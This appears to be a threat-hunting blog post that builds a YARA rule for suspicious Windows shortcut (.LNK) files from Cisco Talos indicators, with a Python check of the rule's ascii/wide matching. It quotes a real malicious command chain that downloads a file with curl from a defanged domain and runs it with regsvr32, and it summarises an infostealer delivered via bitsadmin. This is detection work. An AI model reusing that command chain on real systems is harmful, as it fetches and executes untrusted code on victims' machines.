
# Day 8 - Suspicious LNK Files

The inspiration for today's YARA rule comes from Cisco Talos's newest blog post, Following the LNK metadata trail. I started by reviewing the LNK files included in their IOCs.

I noticed that a few of the LNK files mentioned use `&&` quite a bit:

```
/q /c echo 'SGz' && echo "TYEq" && MD "%HOMEPATH%\bG" && echo "Nm" && ping ExCt.com && echo "rcF" && curl.exe -o %HOMEPATH%\bG\J10M.VI.WYYK https://takeone[.]tech/8NMlHT/EWw.png && regsvr32 "%HOMEPATH%\bG\J10M.VI.WYYK"
```

## Yara Rule

Here's the Yara rule that I created for detecting suspicious LNK files:

```yara
rule sus_lnk_files {
  meta:
    author = "Colin Cowie"
    description = "Yara rule to detect suspicious .LNK files"
    reference = "/~https://github.com/Cisco-Talos/IOCs/blob/main/2023/01/following-the-lnk-metadata-trail.txt"
  strings:
    // 0x4C is the HeaderSize field every Shell Link (.LNK) file starts with
    $lnk_header = { 4C 00 00 00 }
    // match both 8-bit and UTF-16LE encodings of the separator
    $andand = " && " ascii wide
  condition:
    $lnk_header at 0
    and #andand > 2      // at least three chained commands
    and filesize < 5KB
}
```

## Results

At first I did not include `ascii wide` in the YARA rule for the string `$andand = " && "`. Because LNK files typically store their command-line arguments as UTF-16, the ASCII-only string matched nothing; after making that change I got great results instead of none!
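The ascii/wide lesson above and the rule itself, as an added example that is not part of the original post: a pure-Python mirror of the rule's condition, run over a constructed LNK-like blob (a 0x4C-byte header carrying the standard ShellLink CLSID, followed by the post's command line stored as UTF-16LE). It shows that the ASCII form of `" && "` never hits while the wide form hits seven times.

```python
# Added example, not the post's code: re-implements the sus_lnk_files condition in
# plain Python to show why " && " needs the `wide` modifier. The LNK bytes below are
# constructed here, not taken from a real sample.
import sys

LNK_HEADER = bytes.fromhex("4C000000")        # HeaderSize field of a Shell Link
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000C000000000000046")
PATTERN = " && "
MAX_SIZE = 5 * 1024                            # YARA's `5KB` means 5 * 1024 bytes


def count_ascii(data: bytes) -> int:
    """Occurrences of the pattern as 8-bit text (YARA `ascii`)."""
    return data.count(PATTERN.encode("ascii"))


def count_wide(data: bytes) -> int:
    """Occurrences as UTF-16LE, each char followed by 0x00 (YARA `wide`)."""
    return data.count(PATTERN.encode("utf-16-le"))


def sus_lnk_files(data: bytes, wide: bool = True) -> bool:
    """Mirror of the rule condition: header at 0, #andand > 2, filesize < 5KB."""
    hits = count_ascii(data) + (count_wide(data) if wide else 0)
    return data.startswith(LNK_HEADER) and hits > 2 and len(data) < MAX_SIZE


# Command line quoted in the post (domain kept defanged exactly as published).
CMD = ('/q /c echo \'SGz\' && echo "TYEq" && MD "%HOMEPATH%\\bG" && echo "Nm" '
       '&& ping ExCt.com && echo "rcF" && curl.exe -o %HOMEPATH%\\bG\\J10M.VI.WYYK '
       'https://takeone[.]tech/8NMlHT/EWw.png && regsvr32 "%HOMEPATH%\\bG\\J10M.VI.WYYK"')


def build_sample_lnk(arguments: str) -> bytes:
    """Constructed stand-in for a .LNK: 0x4C-byte header (size + CLSID, zero padded),
    then the arguments as UTF-16LE, the way a Unicode LNK's StringData stores them."""
    header = (LNK_HEADER + SHELL_LINK_CLSID).ljust(0x4C, b"\x00")
    return header + arguments.encode("utf-16-le")


SAMPLE = build_sample_lnk(CMD)

if __name__ == "__main__":
    # Scan files given on the command line, or the constructed sample if none.
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE)]
    for name, data in targets:
        print(f"{name}: ascii={count_ascii(data)} wide={count_wide(data)} "
              f"match={sus_lnk_files(data)} ascii_only={sus_lnk_files(data, wide=False)}")
```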

Here's one interesting finding:

- Filename: output.lnk
- SHA1: 24fec293033b5c7103b1c1031394043943497459
- VT Upload date: 2023-01-07 13:27:41 UTC

Functionality:

1. Uses `bitsadmin /transfer` to download a .bat script from the Discord CDN
2. The .bat script downloads payload.exe (InfoStealer)

Payload:

## References